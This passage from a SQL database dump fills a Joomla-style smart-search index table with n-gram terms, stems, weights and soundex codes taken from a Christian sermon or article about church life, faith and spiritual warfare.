(272739, 'christians and too', 'christian and too', 0, 1, 1.6, 'C6235253', 1, '*'),
(272740, 'christians are shallow', 'christian are shallow', 0, 1, 1.7333, 'C62352624', 1, '*'),
(272741, 'christians come', 'christian come', 0, 1, 1.5, 'C623525', 1, '*'),
(272742, 'christians come to', 'christian come to', 0, 1, 1.6, 'C6235253', 1, '*'),
(272743, 'christians have become', 'christian have become', 0, 1, 1.7333, 'C62352125', 1, '*'),
(272744, 'christians share', 'christian share', 0, 1, 1.5333, 'C623526', 1, '*'),
(272745, 'christians share on', 'christian share on', 0, 1, 1.6333, 'C6235265', 1, '*'),
(272746, 'christians to a', 'christian to a', 0, 1, 1.5, 'C623523', 1, '*'),
(272747, 'christians today can\'t', 'christian today can', 0, 1, 1.7333, 'C623523253', 1, '*'),
(272748, 'christians we', 'christian we', 0, 1, 1.4333, 'C62352', 1, '*'),
(272749, 'christians we are', 'christian we are', 0, 1, 1.5667, 'C623526', 1, '*'),
(272750, 'christians we have', 'christian we have', 0, 1, 1.6, 'C623521', 1, '*'),
(272751, 'christians who are', 'christian who are', 0, 1, 1.6, 'C623526', 1, '*'),
(272752, 'christians who can', 'christian who can', 0, 1, 1.6, 'C623525', 1, '*'),
(272753, 'church about', 'church about', 0, 1, 1.4, 'C6213', 1, '*'),
(272754, 'church about destiny', 'church about destiny', 0, 1, 1.6667, 'C6213235', 1, '*'),
(272755, 'church already', 'church already', 0, 1, 1.4667, 'C62463', 1, '*'),
(272756, 'church already doubting', 'church already doubting', 0, 1, 1.7667, 'C624631352', 1, '*'),
(272757, 'church on sunday', 'church on sunday', 0, 1, 1.5333, 'C625253', 1, '*'),
(272758, 'church one', 'church one', 0, 1, 1.3333, 'C625', 1, '*'),
(272759, 'church one of', 'church one of', 0, 1, 1.4333, 'C6251', 1, '*'),
(272760, 'churches either', 'church either', 0, 1, 1.5, 'C6236', 1, '*'),
(272761, 'churches either don\'t', 'church either don', 0, 1, 1.7, 'C6236353', 1, '*'),
(272762, 'churchy', 'churchi', 0, 0, 0.4667, 'C620', 1, '*'),
(272763, 'churchy to', 'churchi to', 0, 1, 1.3333, 'C623', 1, '*'),
(272764, 'churchy to be', 'churchi to be', 0, 1, 1.4333, 'C6231', 1, '*'),
(272765, 'clear understanding', 'clear understanding', 0, 1, 1.6333, 'C46536235352', 1, '*'),
(272766, 'clear understanding of', 'clear understanding of', 0, 1, 1.7333, 'C465362353521', 1, '*'),
(272767, 'clearly why', 'clearli why', 0, 1, 1.3667, 'C464', 1, '*'),
(272768, 'clearly why you', 'clearli why you', 0, 1, 1.5, 'C464', 1, '*'),
(272769, 'cold nor', 'cold nor', 0, 1, 1.2667, 'C4356', 1, '*'),
(272770, 'cold nor hot', 'cold nor hot', 0, 1, 1.4, 'C43563', 1, '*'),
(272771, 'cold or', 'cold or', 0, 1, 1.2333, 'C436', 1, '*'),
(272772, 'cold or hot', 'cold or hot', 0, 1, 1.3667, 'C4363', 1, '*'),
(272773, 'come to church', 'come to church', 0, 1, 1.4667, 'C53262', 1, '*'),
(272774, 'comfortable', 'comfort', 0, 0, 0.7333, 'C516314', 2, '*'),
(272775, 'comfortable teach', 'comfort teach', 0, 1, 1.5667, 'C51631432', 1, '*'),
(272776, 'comfortable teach others', 'comfort teach others', 0, 1, 1.8, 'C51631432362', 1, '*'),
(272777, 'commandments given', 'command given', 0, 1, 1.6, 'C5353215', 1, '*'),
(272778, 'commandments given to', 'command given to', 0, 1, 1.7, 'C53532153', 1, '*'),
(272779, 'commandments he', 'command he', 0, 1, 1.5, 'C53532', 1, '*'),
(272780, 'commandments he has', 'command he has', 0, 1, 1.6333, 'C53532', 1, '*'),
(272781, 'commandments properly', 'command properly', 0, 1, 1.7, 'C5353216164', 1, '*'),
(272782, 'commandments properly let\'s', 'command properly let', 0, 1, 1.9, 'C535321616432', 1, '*'),
(272783, 'commission all', 'commiss all', 0, 1, 1.4667, 'C5254', 1, '*'),
(272784, 'commission all christians', 'commiss all christians', 0, 1, 1.8333, 'C5254262352', 1, '*'),
(272785, 'competent', 'compet', 0, 0, 0.6, 'C51353', 1, '*'),
(272786, 'competent and', 'compet and', 0, 1, 1.4333, 'C5135353', 1, '*'),
(272787, 'competent and strong', 'compet and strong', 0, 1, 1.6667, 'C513535323652', 1, '*'),
(272788, 'concepts', 'concept', 0, 0, 0.5333, 'C52132', 1, '*'),
(272789, 'concepts and', 'concept and', 0, 1, 1.4, 'C5213253', 1, '*'),
(272790, 'concepts and precepts', 'concept and precepts', 0, 1, 1.7, 'C5213253162132', 1, '*'),
(272791, 'confidence in his', 'confid in his', 0, 1, 1.5667, 'C5135252', 1, '*'),
(272792, 'confidence that allows', 'confid that allows', 0, 1, 1.7333, 'C51352342', 1, '*'),
(272793, 'confused individuals', 'confus individuals', 0, 1, 1.6667, 'C5123531342', 1, '*'),
(272794, 'contamination', 'contamin', 0, 0, 0.8667, 'C53535', 1, '*'),
(272795, 'contamination of', 'contamin of', 0, 1, 1.5333, 'C535351', 1, '*'),
(272796, 'contamination of the', 'contamin of the', 0, 1, 1.6667, 'C5353513', 1, '*'),
(272797, 'corinthians 10', 'corinthian 10', 0, 1, 1.4667, 'C65352', 1, '*'),
(272798, 'corinthians 10 11-13', 'corinthian 10 11-13', 0, 1, 1.6667, 'C65352', 1, '*'),
(272799, 'corinthians 3', 'corinthian 3', 0, 1, 1.4333, 'C65352', 1, '*'),
(272800, 'corinthians 3 17', 'corinthian 3 17', 0, 1, 1.5333, 'C65352', 1, '*'),
(272801, 'crisis', 'crisi', 0, 0, 0.4, 'C620', 1, '*'),
(272802, 'crisis the', 'crisi the', 0, 1, 1.3333, 'C623', 1, '*'),
(272803, 'crisis the problems', 'crisi the problems', 0, 1, 1.6333, 'C623161452', 1, '*'),
(272804, 'danger of this', 'danger of this', 0, 1, 1.4667, 'D526132', 1, '*'),
(272805, 'darkness sadly', 'dark sadly', 0, 1, 1.4667, 'D625234', 1, '*'),
(272806, 'darkness sadly however', 'dark sadly however', 0, 1, 1.7333, 'D62523416', 1, '*'),
(272807, 'deadly', 'deadli', 0, 0, 0.4, 'D400', 1, '*'),
(272808, 'deadly thing', 'deadli thing', 0, 1, 1.4, 'D4352', 1, '*'),
(272809, 'deadly thing it', 'deadli thing it', 0, 1, 1.5, 'D43523', 1, '*'),
(272810, 'deceive', 'deceiv', 0, 0, 0.4667, 'D210', 1, '*'),
(272811, 'deceive you', 'deceiv you', 0, 1, 1.3667, 'D210', 1, '*'),
(272812, 'deceive you anymore', 'deceiv you anymore', 0, 1, 1.6333, 'D2156', 1, '*'),
(272813, 'declare without', 'declar without', 0, 1, 1.5, 'D2463', 1, '*'),
(272814, 'declare without faith', 'declar without faith', 0, 1, 1.7, 'D246313', 1, '*'),
(272815, 'demon', 'demon', 0, 0, 0.3333, 'D500', 1, '*'),
(272816, 'demon possessed', 'demon possessed', 0, 1, 1.5, 'D5123', 1, '*'),
(272817, 'demon possessed person', 'demon possessed person', 0, 1, 1.7333, 'D51231625', 1, '*'),
(272818, 'destiny purpose', 'destini purpose', 0, 1, 1.5, 'D2351612', 1, '*'),
(272819, 'destiny purpose proper', 'destini purpose proper', 0, 1, 1.7333, 'D23516121616', 1, '*'),
(272820, 'destruction upon', 'destruct upon', 0, 1, 1.5333, 'D23623515', 1, '*'),
(272821, 'destruction upon the', 'destruct upon the', 0, 1, 1.6667, 'D236235153', 1, '*'),
(272822, 'determined by how', 'determin by how', 0, 1, 1.5667, 'D6531', 1, '*'),
(272823, 'devil can', 'devil can', 0, 1, 1.3, 'D1425', 1, '*'),
(272824, 'devil can be', 'devil can be', 0, 1, 1.4, 'D14251', 1, '*'),
(272825, 'devil have', 'devil have', 0, 1, 1.3333, 'D141', 1, '*'),
(272826, 'devil have been', 'devil have been', 0, 1, 1.5, 'D1415', 1, '*'),
(272827, 'devil such', 'devil such', 0, 1, 1.3333, 'D142', 1, '*'),
(272828, 'devil such that', 'devil such that', 0, 1, 1.5, 'D1423', 1, '*'),
(272829, 'devils', 'devil', 0, 0, 0.4, 'D142', 1, '*'),
(272830, 'devils 2', 'devil 2', 0, 1, 1.2667, 'D142', 1, '*'),
(272831, 'devils 2 corinthians', 'devil 2 corinthians', 0, 1, 1.6667, 'D14265352', 1, '*'),
(272832, 'devils from', 'devil from', 0, 1, 1.3667, 'D142165', 1, '*'),
(272833, 'devils from people', 'devil from people', 0, 1, 1.6, 'D14216514', 1, '*'),
(272834, 'direct danger', 'direct danger', 0, 1, 1.4333, 'D623526', 1, '*'),
(272835, 'direct danger of', 'direct danger of', 0, 1, 1.5333, 'D6235261', 1, '*'),
(272836, 'directly determined', 'directli determined', 0, 1, 1.6333, 'D62343653', 1, '*'),
(272837, 'directly determined by', 'directli determined by', 0, 1, 1.7333, 'D623436531', 1, '*'),
(272838, 'disciple', 'discipl', 0, 0, 0.5333, 'D214', 1, '*'),
(272839, 'disciple new', 'discipl new', 0, 1, 1.4, 'D2145', 1, '*'),
(272840, 'disciple new christians', 'discipl new christians', 0, 1, 1.7667, 'D2145262352', 1, '*'),
(272841, 'do his', 'do his', 0, 1, 1.2, 'D200', 1, '*'),
(272842, 'do his great', 'do his great', 0, 1, 1.4, 'D263', 1, '*'),
(272843, 'do so', 'do so', 0, 1, 1.1667, 'D200', 2, '*'),
(272844, 'do so is', 'do so is', 0, 1, 1.2667, 'D200', 1, '*'),
(272845, 'doctrines like', 'doctrin like', 0, 1, 1.4667, 'D2365242', 1, '*'),
(272846, 'doctrines like this', 'doctrin like this', 0, 1, 1.6333, 'D236524232', 1, '*'),
(272847, 'doesn\'t know how', 'doesn know how', 0, 1, 1.5333, 'D25325', 1, '*'),
(272848, 'doesn\'t stop', 'doesn stop', 0, 1, 1.4, 'D253231', 1, '*'),
(272849, 'doesn\'t stop there', 'doesn stop there', 0, 1, 1.6, 'D25323136', 1, '*'),
(272850, 'don\'t believe', 'don believe', 0, 1, 1.4333, 'D53141', 1, '*'),
(272851, 'don\'t believe in', 'don believe in', 0, 1, 1.5333, 'D531415', 1, '*'),
(272852, 'don\'t believe me', 'don believe me', 0, 1, 1.5333, 'D531415', 1, '*'),
(272853, 'don\'t just happen', 'don just happen', 0, 1, 1.5667, 'D532315', 1, '*'),
(272854, 'doubting', 'doubt', 0, 0, 0.5333, 'D1352', 1, '*'),
(272855, 'doubting the', 'doubt the', 0, 1, 1.4, 'D13523', 1, '*'),
(272856, 'doubting the bible', 'doubt the bible', 0, 1, 1.6, 'D1352314', 1, '*'),
(272857, 'dream centre of', 'dream centre of', 0, 1, 1.5, 'D6525361', 1, '*'),
(272858, 'dressing etc', 'dress etc', 0, 1, 1.4, 'D625232', 1, '*'),
(272859, 'dressing etc it', 'dress etc it', 0, 1, 1.5, 'D6252323', 1, '*'),
(272860, 'drink any', 'drink any', 0, 1, 1.3, 'D6525', 1, '*'),
(272861, 'drink any deadly', 'drink any deadly', 0, 1, 1.5333, 'D652534', 1, '*'),
(272862, 'driven by', 'driven by', 0, 1, 1.3, 'D6151', 1, '*'),
(272863, 'driven by the', 'driven by the', 0, 1, 1.4333, 'D61513', 1, '*'),
(272864, 'duties and', 'duti and', 0, 1, 1.3333, 'D253', 1, '*'),
(272865, 'duties and expectations', 'duti and expectations', 0, 1, 1.7667, 'D253212352', 1, '*'),
(272866, 'duty', 'duti', 0, 0, 0.2667, 'D000', 2, '*'),
(272867, 'duty as', 'duti as', 0, 1, 1.2333, 'D200', 1, '*'),
(272868, 'duty as a', 'duti as a', 0, 1, 1.3, 'D200', 1, '*'),
(272869, 'earth in', 'earth in', 0, 1, 1.2667, 'E635', 1, '*'),
(272870, 'earth in this', 'earth in this', 0, 1, 1.4333, 'E63532', 1, '*'),
(272871, 'earth is', 'earth is', 0, 1, 1.2667, 'E632', 1, '*'),
(272872, 'earth is to', 'earth is to', 0, 1, 1.3667, 'E6323', 1, '*'),
(272873, 'effectively teach', 'effect teach', 0, 1, 1.5667, 'E1231432', 1, '*'),
(272874, 'effectively teach the', 'effect teach the', 0, 1, 1.7, 'E12314323', 1, '*'),
(272875, 'efficiency', 'effici', 0, 0, 0.6667, 'E1252', 1, '*'),
(272876, 'efficiency of', 'effici of', 0, 1, 1.4333, 'E12521', 1, '*'),
(272877, 'efficiency of this', 'effici of this', 0, 1, 1.6, 'E1252132', 1, '*'),
(272878, 'either don\'t', 'either don', 0, 1, 1.4, 'E36353', 1, '*'),
(272879, 'either don\'t believe', 'either don believe', 0, 1, 1.6667, 'E36353141', 1, '*'),
(272880, 'empowered with', 'empow with', 0, 1, 1.4667, 'E5163', 1, '*'),
(272881, 'empowered with many', 'empow with many', 0, 1, 1.6333, 'E51635', 1, '*'),
(272882, 'enemy and', 'enemi and', 0, 1, 1.3, 'E530', 1, '*'),
(272883, 'enemy and they', 'enemi and they', 0, 1, 1.4667, 'E530', 1, '*'),
(272884, 'enemy he', 'enemi he', 0, 1, 1.2667, 'E500', 1, '*'),
(272885, 'enemy he will', 'enemi he will', 0, 1, 1.4333, 'E540', 1, '*'),
(272886, 'enemy you', 'enemi you', 0, 1, 1.3, 'E500', 1, '*'),
(272887, 'enemy you must', 'enemi you must', 0, 1, 1.4667, 'E523', 1, '*'),
(272888, 'engaged', 'engag', 0, 0, 0.4667, 'E523', 1, '*'),
(272889, 'engaged in', 'engag in', 0, 1, 1.3333, 'E5235', 1, '*'),
(272890, 'engaged in an', 'engag in an', 0, 1, 1.4333, 'E5235', 1, '*'),
(272891, 'enough from', 'enough from', 0, 1, 1.3667, 'E52165', 1, '*'),
(272892, 'enough from your', 'enough from your', 0, 1, 1.5333, 'E521656', 1, '*'),
(272893, 'enough in', 'enough in', 0, 1, 1.3, 'E525', 1, '*'),
(272894, 'enough in their', 'enough in their', 0, 1, 1.5, 'E52536', 1, '*'),
(272895, 'entirely', 'entir', 0, 0, 0.5333, 'E5364', 1, '*'),
(272896, 'entirely however', 'entir however', 0, 1, 1.5333, 'E536416', 1, '*'),
(272897, 'entirely however the', 'entir however the', 0, 1, 1.6667, 'E5364163', 1, '*'),
(272898, 'equips', 'equip', 0, 0, 0.4, 'E212', 2, '*'),
(272899, 'equips you', 'equip you', 0, 1, 1.3333, 'E212', 2, '*'),
(272900, 'equips you to', 'equip you to', 0, 1, 1.4333, 'E2123', 1, '*'),
(272901, 'etc it', 'etc it', 0, 1, 1.2, 'E323', 1, '*'),
(272902, 'etc it has', 'etc it has', 0, 1, 1.3333, 'E3232', 1, '*'),
(272903, 'every member a', 'everi member a', 0, 1, 1.4667, 'E16516', 1, '*'),
(272904, 'expectations', 'expect', 0, 0, 0.8, 'E212352', 1, '*'),
(272905, 'expectations of', 'expect of', 0, 1, 1.5, 'E2123521', 1, '*'),
(272906, 'expectations of christians', 'expect of christians', 0, 1, 1.8667, 'E2123521262352', 1, '*'),
(272907, 'facing today\'s', 'face today', 0, 1, 1.4667, 'F25232', 1, '*'),
(272908, 'facing today\'s christianity', 'face today christianity', 0, 1, 1.9, 'F2523262353', 1, '*'),
(272909, 'fail god', 'fail god', 0, 1, 1.2667, 'F423', 1, '*'),
(272910, 'fail god in', 'fail god in', 0, 1, 1.3667, 'F4235', 1, '*'),
(272911, 'failure is', 'failur is', 0, 1, 1.3333, 'F462', 1, '*'),
(272912, 'failure is certain', 'failur is certain', 0, 1, 1.6, 'F462635', 1, '*'),
(272913, 'faith and confidence', 'faith and confidence', 0, 1, 1.6667, 'F353251352', 1, '*'),
(272914, 'faith and spiritual', 'faith and spiritual', 0, 1, 1.6333, 'F35321634', 1, '*'),
(272915, 'faith in god', 'faith in god', 0, 1, 1.4, 'F3523', 1, '*'),
(272916, 'faith that you\'re', 'faith that you', 0, 1, 1.5667, 'F360', 1, '*'),
(272917, 'faith to', 'faith to', 0, 1, 1.2667, 'F300', 2, '*'),
(272918, 'faith to be', 'faith to be', 0, 1, 1.3667, 'F310', 1, '*'),
(272919, 'fame', 'fame', 0, 0, 0.2667, 'F500', 1, '*'),
(272920, 'fame and', 'fame and', 0, 1, 1.2667, 'F530', 1, '*'),
(272921, 'fame and status', 'fame and status', 0, 1, 1.5, 'F53232', 1, '*'),
(272922, 'fast this', 'fast this', 0, 1, 1.3, 'F232', 1, '*'),
(272923, 'fast this problem', 'fast this problem', 0, 1, 1.5667, 'F23216145', 1, '*'),
(272924, 'find yourself to', 'find yourself to', 0, 1, 1.5333, 'F5362413', 1, '*'),
(272925, 'firm', 'firm', 0, 0, 0.2667, 'F650', 1, '*'),
(272926, 'firm grasp', 'firm grasp', 0, 1, 1.3333, 'F652621', 1, '*'),
(272927, 'firm grasp of', 'firm grasp of', 0, 1, 1.4333, 'F652621', 1, '*'),
(272928, 'first duty', 'first duty', 0, 1, 1.3333, 'F623', 1, '*'),
(272929, 'first duty as', 'first duty as', 0, 1, 1.4333, 'F6232', 1, '*'),
(272930, 'first person', 'first person', 0, 1, 1.4, 'F6231625', 1, '*'),
(272931, 'first person to', 'first person to', 0, 1, 1.5, 'F62316253', 1, '*'),
(272932, 'first place', 'first place', 0, 1, 1.3667, 'F623142', 1, '*'),
(272933, 'first place which', 'first place which', 0, 1, 1.5667, 'F623142', 1, '*'),
(272934, 'fixated', 'fixat', 0, 0, 0.4667, 'F230', 1, '*'),
(272935, 'fixated on', 'fixat on', 0, 1, 1.3333, 'F235', 1, '*'),
(272936, 'fixated on obsessed', 'fixat on obsessed', 0, 1, 1.6333, 'F235123', 1, '*'),
(272937, 'follow those', 'follow those', 0, 1, 1.4, 'F432', 1, '*'),
(272938, 'follow those commandments', 'follow those commandments', 0, 1, 1.8333, 'F43253532', 1, '*'),
(272939, 'following you', 'follow you', 0, 1, 1.4333, 'F452', 1, '*'),
(272940, 'following you must', 'follow you must', 0, 1, 1.6, 'F452523', 1, '*'),
(272941, 'for a very', 'for a very', 0, 1, 1.3333, 'F616', 1, '*'),
(272942, 'for the christian', 'for the christian', 0, 1, 1.5667, 'F6326235', 1, '*'),
(272943, 'for the souls', 'for the souls', 0, 1, 1.4333, 'F63242', 1, '*'),
(272944, 'forth destruction', 'forth destruction', 0, 1, 1.5667, 'F63236235', 1, '*'),
(272945, 'forth destruction upon', 'forth destruction upon', 0, 1, 1.7333, 'F6323623515', 1, '*'),
(272946, 'from people or', 'from people or', 0, 1, 1.4667, 'F65146', 1, '*'),
(272947, 'from your pastor', 'from your pastor', 0, 1, 1.5333, 'F6561236', 1, '*'),
(272948, 'future and their', 'futur and their', 0, 1, 1.5333, 'F36536', 1, '*'),
(272949, 'game', 'game', 0, 0, 0.2667, 'G500', 1, '*'),
(272950, 'game than', 'game than', 0, 1, 1.3, 'G535', 1, '*'),
(272951, 'game than they', 'game than they', 0, 1, 1.4667, 'G5353', 1, '*'),
(272952, 'general', 'gener', 0, 0, 0.4667, 'G564', 1, '*'),
(272953, 'general commission', 'gener commission', 0, 1, 1.6, 'G5642525', 1, '*'),
(272954, 'general commission all', 'gener commission all', 0, 1, 1.7333, 'G56425254', 1, '*'),
(272955, 'generation when', 'gener when', 0, 1, 1.5, 'G5635', 1, '*'),
(272956, 'generation when you', 'gener when you', 0, 1, 1.6333, 'G5635', 1, '*'),
(272957, 'ghost baptism and', 'ghost baptism and', 0, 1, 1.5667, 'G313253', 1, '*'),
(272958, 'given us god', 'given us god', 0, 1, 1.4, 'G1523', 1, '*'),
(272959, 'gives the holy', 'give the holy', 0, 1, 1.4667, 'G1234', 1, '*'),
(272960, 'givesyou', 'givesy', 0, 0, 0.5333, 'G120', 1, '*'),
(272961, 'givesyou romans', 'givesy romans', 0, 1, 1.5, 'G12652', 1, '*'),
(272962, 'givesyou romans 8', 'givesy romans 8', 0, 1, 1.5667, 'G12652', 1, '*'),
(272963, 'giving birth', 'give birth', 0, 1, 1.4, 'G152163', 1, '*'),
(272964, 'giving birth to', 'give birth to', 0, 1, 1.5, 'G152163', 1, '*'),
(272965, 'god duties', 'god duties', 0, 1, 1.3333, 'G320', 1, '*'),
(272966, 'god duties and', 'god duties and', 0, 1, 1.4667, 'G3253', 1, '*'),
(272967, 'god majority', 'god majority', 0, 1, 1.4, 'G35263', 1, '*'),
(272968, 'god majority of', 'god majority of', 0, 1, 1.5, 'G352631', 1, '*'),
(272969, 'god most', 'god most', 0, 1, 1.2667, 'G3523', 1, '*'),
(272970, 'god most christians', 'god most christians', 0, 1, 1.6333, 'G3523262352', 1, '*'),
(272971, 'god requires that', 'god requires that', 0, 1, 1.5667, 'G362623', 1, '*'),
(272972, 'god\'s representatives', 'god representatives', 0, 1, 1.7, 'G3261625312', 1, '*'),
(272973, 'god\'s representatives on', 'god representatives on', 0, 1, 1.8, 'G32616253125', 1, '*'),
(272974, 'going through right', 'go through right', 0, 1, 1.6333, 'G52362623', 1, '*'),
(272975, 'good news to', 'good news to', 0, 1, 1.4, 'G3523', 1, '*'),
(272976, 'gospel to all', 'gospel to all', 0, 1, 1.4333, 'G1434', 1, '*'),
(272977, 'gospel to people', 'gospel to people', 0, 1, 1.5333, 'G14314', 1, '*'),
(272978, 'grasp', 'grasp', 0, 0, 0.3333, 'G621', 1, '*'),
(272979, 'grasp of', 'grasp of', 0, 1, 1.2667, 'G621', 1, '*'),
(272980, 'grasp of the', 'grasp of the', 0, 1, 1.4, 'G6213', 1, '*'),
(272981, 'great work', 'great work', 0, 1, 1.3333, 'G6362', 1, '*'),
(272982, 'great work in', 'great work in', 0, 1, 1.4333, 'G63625', 1, '*'),
(272983, 'ground to', 'ground to', 0, 1, 1.3, 'G653', 1, '*'),
(272984, 'ground to the', 'ground to the', 0, 1, 1.4333, 'G653', 1, '*'),
(272985, 'guide', 'guid', 0, 0, 0.3333, 'G300', 1, '*'),
(272986, 'guide and', 'guid and', 0, 1, 1.3, 'G353', 1, '*'),
(272987, 'guide and disciple', 'guid and disciple', 0, 1, 1.6, 'G353214', 1, '*'),
(272988, 'hands on the', 'hand on the', 0, 1, 1.4, 'H53253', 1, '*'),
(272989, 'happen automatically', 'happen automatically', 0, 1, 1.6667, 'H1535324', 1, '*'),
(272990, 'happen automatically if', 'happen automatically if', 0, 1, 1.7667, 'H15353241', 1, '*'),
(272991, 'happening', 'happen', 0, 0, 0.6, 'H152', 1, '*'),
(272992, 'happening in', 'happen in', 0, 1, 1.4, 'H1525', 1, '*'),
(272993, 'happening in the', 'happen in the', 0, 1, 1.5333, 'H15253', 1, '*'),
(272994, 'happens when', 'happen when', 0, 1, 1.4, 'H1525', 1, '*'),
(272995, 'happens when we', 'happen when we', 0, 1, 1.5, 'H1525', 1, '*'),
(272996, 'has reached', 'ha reached', 0, 1, 1.3667, 'H2623', 1, '*'),
(272997, 'has reached the', 'ha reached the', 0, 1, 1.5, 'H2623', 1, '*'),
(272998, 'has to say', 'ha to say', 0, 1, 1.3333, 'H232', 1, '*'),
(272999, 'have a clear', 'have a clear', 0, 1, 1.4, 'H1246', 1, '*'),
(273000, 'have a firm', 'have a firm', 0, 1, 1.3667, 'H165', 1, '*'),
(273001, 'have a look', 'have a look', 0, 1, 1.3667, 'H142', 1, '*'),
(273002, 'have a strong', 'have a strong', 0, 1, 1.4333, 'H123652', 1, '*'),
(273003, 'have become increasingly', 'have become increasingly', 0, 1, 1.8, 'H125262524', 1, '*'),
(273004, 'have become too', 'have become too', 0, 1, 1.5, 'H1253', 1, '*'),
(273005, 'have been empowered', 'have been empowered', 0, 1, 1.6333, 'H15163', 1, '*'),
(273006, 'have been engaged', 'have been engaged', 0, 1, 1.5667, 'H1523', 1, '*'),
(273007, 'have learnt', 'have learnt', 0, 1, 1.3667, 'H14653', 1, '*'),
(273008, 'have learnt enough', 'have learnt enough', 0, 1, 1.6, 'H1465352', 1, '*'),
(273009, 'have many', 'have many', 0, 1, 1.3, 'H150', 1, '*'),
(273010, 'have many spiritual', 'have many spiritual', 0, 1, 1.6333, 'H1521634', 1, '*'),
(273011, 'he has given', 'he has given', 0, 1, 1.4, 'H215', 2, '*'),
(273012, 'he will not', 'he will not', 0, 1, 1.3667, 'H453', 2, '*'),
(273013, 'heal', 'heal', 0, 0, 0.2667, 'H400', 1, '*'),
(273014, 'heal the', 'heal the', 0, 1, 1.2667, 'H430', 1, '*'),
(273015, 'heal the sick', 'heal the sick', 0, 1, 1.4333, 'H432', 1, '*'),
(273016, 'here you', 'here you', 0, 1, 1.2667, 'H600', 1, '*'),
(273017, 'here you must', 'here you must', 0, 1, 1.4333, 'H6523', 1, '*'),
(273018, 'him out and', 'him out and', 0, 1, 1.3667, 'H5353', 1, '*'),
(273019, 'his ability', 'hi ability', 0, 1, 1.3667, 'H2143', 1, '*'),
(273020, 'his great', 'hi great', 0, 1, 1.3, 'H263', 1, '*'),
(273021, 'his great work', 'hi great work', 0, 1, 1.4667, 'H26362', 1, '*'),
(273022, 'his name and', 'hi name and', 0, 1, 1.4, 'H253', 1, '*'),
(273023, 'his operations', 'hi operations', 0, 1, 1.4667, 'H216352', 2, '*'),
(273024, 'his operations without', 'hi operations without', 0, 1, 1.7333, 'H2163523', 1, '*'),
(273025, 'his soldiers', 'hi soldiers', 0, 1, 1.4, 'H24362', 1, '*'),
(273026, 'his soldiers we', 'hi soldiers we', 0, 1, 1.5, 'H24362', 1, '*'),
(273027, 'his weaponry', 'hi weaponry', 0, 1, 1.4, 'H2156', 1, '*'),
(273028, 'his weaponry and', 'hi weaponry and', 0, 1, 1.5333, 'H215653', 1, '*'),
(273029, 'hospital', 'hospit', 0, 0, 0.5333, 'H2134', 1, '*'),
(273030, 'hospital and', 'hospit and', 0, 1, 1.4, 'H213453', 1, '*'),
(273031, 'hospital and declare', 'hospit and declare', 0, 1, 1.6667, 'H213453246', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(273032, 'hot i', 'hot i', 0, 1, 1.1667, 'H300', 1, '*'),
(273033, 'hot i would', 'hot i would', 0, 1, 1.3667, 'H343', 1, '*'),
(273034, 'hot revelation', 'hot revelation', 0, 1, 1.4667, 'H361435', 1, '*'),
(273035, 'hot revelation 3', 'hot revelation 3', 0, 1, 1.5333, 'H361435', 1, '*'),
(273036, 'how to cast', 'how to cast', 0, 1, 1.3667, 'H323', 1, '*'),
(273037, 'how to operate', 'how to operate', 0, 1, 1.4667, 'H3163', 1, '*'),
(273038, 'how to solve', 'how to solve', 0, 1, 1.4, 'H3241', 1, '*'),
(273039, 'how to speak', 'how to speak', 0, 1, 1.4, 'H3212', 1, '*'),
(273040, 'however in', 'howev in', 0, 1, 1.3333, 'H165', 1, '*'),
(273041, 'however in these', 'howev in these', 0, 1, 1.5333, 'H16532', 1, '*'),
(273042, 'however the efficiency', 'howev the efficiency', 0, 1, 1.7333, 'H1631252', 1, '*'),
(273043, 'hundred percent', 'hundr percent', 0, 1, 1.5, 'H536316253', 1, '*'),
(273044, 'hundred percent sure', 'hundr percent sure', 0, 1, 1.6667, 'H53631625326', 1, '*'),
(273045, 'hurt', 'hurt', 0, 0, 0.2667, 'H630', 1, '*'),
(273046, 'hurt us', 'hurt us', 0, 1, 1.2333, 'H632', 1, '*'),
(273047, 'hurt us we', 'hurt us we', 0, 1, 1.3333, 'H632', 1, '*'),
(273048, 'i believe comes', 'i believe comes', 0, 1, 1.5, 'I141252', 1, '*'),
(273049, 'i know thy', 'i know thy', 0, 1, 1.3333, 'I253', 1, '*'),
(273050, 'i would', 'i would', 0, 1, 1.2333, 'I430', 1, '*'),
(273051, 'i would thou', 'i would thou', 0, 1, 1.4, 'I430', 1, '*'),
(273052, 'i\'m hundred', 'i hundred', 0, 1, 1.3667, 'I5363', 1, '*'),
(273053, 'i\'m hundred percent', 'i hundred percent', 0, 1, 1.6333, 'I536316253', 1, '*'),
(273054, 'identity', 'ident', 0, 0, 0.5333, 'I353', 1, '*'),
(273055, 'identity crisis', 'ident crisis', 0, 1, 1.5, 'I353262', 1, '*'),
(273056, 'identity crisis the', 'ident crisis the', 0, 1, 1.6333, 'I3532623', 1, '*'),
(273057, 'if we drink', 'if we drink', 0, 1, 1.3667, 'I13652', 1, '*'),
(273058, 'ignorance in', 'ignor in', 0, 1, 1.4, 'I256525', 1, '*'),
(273059, 'ignorance in the', 'ignor in the', 0, 1, 1.5333, 'I2565253', 1, '*'),
(273060, 'ignore', 'ignor', 0, 0, 0.4, 'I256', 2, '*'),
(273061, 'ignore the', 'ignor the', 0, 1, 1.3333, 'I2563', 1, '*'),
(273062, 'ignore the real', 'ignor the real', 0, 1, 1.5, 'I256364', 1, '*'),
(273063, 'important because', 'import because', 0, 1, 1.5667, 'I51635312', 2, '*'),
(273064, 'important because it', 'import because it', 0, 1, 1.6667, 'I516353123', 1, '*'),
(273065, 'in an', 'in an', 0, 1, 1.1667, 'I500', 2, '*'),
(273066, 'in an all-out', 'in an all-out', 0, 1, 1.4333, 'I543', 1, '*'),
(273067, 'in church on', 'in church on', 0, 1, 1.4, 'I52625', 1, '*'),
(273068, 'in his ability', 'in his ability', 0, 1, 1.4667, 'I52143', 1, '*'),
(273069, 'in his name', 'in his name', 0, 1, 1.3667, 'I525', 1, '*'),
(273070, 'in mark', 'in mark', 0, 1, 1.2333, 'I562', 1, '*'),
(273071, 'in mark chapter', 'in mark chapter', 0, 1, 1.5, 'I562136', 1, '*'),
(273072, 'in mark\'s', 'in mark', 0, 1, 1.3, 'I562', 1, '*'),
(273073, 'in mark\'s account', 'in mark account', 0, 1, 1.5667, 'I56253', 1, '*'),
(273074, 'in matthew\'s', 'in matthew', 0, 1, 1.4, 'I532', 1, '*'),
(273075, 'in matthew\'s account', 'in matthew account', 0, 1, 1.6667, 'I53253', 1, '*'),
(273076, 'in my church', 'in my church', 0, 1, 1.4, 'I5262', 1, '*'),
(273077, 'in or', 'in or', 0, 1, 1.1667, 'I560', 1, '*'),
